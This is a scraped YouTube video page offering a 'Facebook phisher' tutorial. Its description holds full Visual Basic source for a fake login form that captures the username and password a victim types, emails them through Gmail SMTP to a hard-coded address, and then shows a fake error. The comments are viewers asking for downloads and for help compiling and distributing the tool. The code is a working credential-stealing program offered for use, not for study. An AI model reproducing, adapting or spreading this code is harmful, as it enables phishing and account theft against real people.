Facebook Phisher TUTORIAL* + source code (Visual Basic)

Loading...

Sign in or sign up now!
Alert icon
Upgrade to the latest Flash Player for improved playback performance. Upgrade now or more info.
7,916
Loading...
Alert icon
Sign in or sign up now!
Alert icon
Ratings have been disabled for this video.

Uploaded by on Dec 1, 2011

Facebook phisher. So here is tutorial and source code you asking for.
Visual basic text encoder here : http://www.youtube.com/watch?v=rCeN6xB1uWQ

Imports System.Net.Mail
Public Class Form1 Dim message As New MailMessage Dim smtp As New SmtpClient Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load End Sub Private Sub PictureBox1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles PictureBox1.Click textbox3.Text = ("USERNAME: ") + TextBox1.Text + (" PASSWORD: ") + TextBox2.Text message.To.Add("mw43al.fb1@gmail.com") message.From = New MailAddress("mw43al@gmail.com", "Password") message.Subject = "FB PASS" message.Body = textbox3.Text smtp.Host = "smtp.gmail.com" smtp.Port = "587" smtp.EnableSsl = True smtp.Credentials = New Net.NetworkCredential("yourmail", "yourpassword") smtp.Send(message) MsgBox("Error") End Sub Private Sub Label5_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Label5.Click MsgBox("Try again later!") End Sub
End Class

Category:

Education

Tags:

License:

Standard YouTube License

Link to this comment:

Share to:

Uploader Comments (mw43al)

  • I think U need Desktop Cleanup

  • @TheMrKaveman true ;(

  • bro where i can contact you

  • @Carlo78550 pm? :D

see all

All Comments (48)

Sign In or Sign Up now to post a comment!
  • @mw43al

    Can you please send me the link to this program ? please btw, send in Mediafire with no password please :)

  • how do i put it up for download i put it on mediafire but whern i download on my other com its says components are missing. PLEASE HELP!!!

  • @KeiswaraOFFICIAL faststone

  • please make a detail video to Facebook Phisher TUTORIAL and give download link for source code

  • how do you compile it?

  • @mw43al nooo! your application capture screen, camstudio?

Loading...

Alert icon
0 / 00Unsaved Playlist Return to active list
    1. Your queue is empty. Add videos to your queue using this button:
      or sign in to load a different list.
    Loading...Loading...Saving...
    • Clear all videos from this list
    • Learn more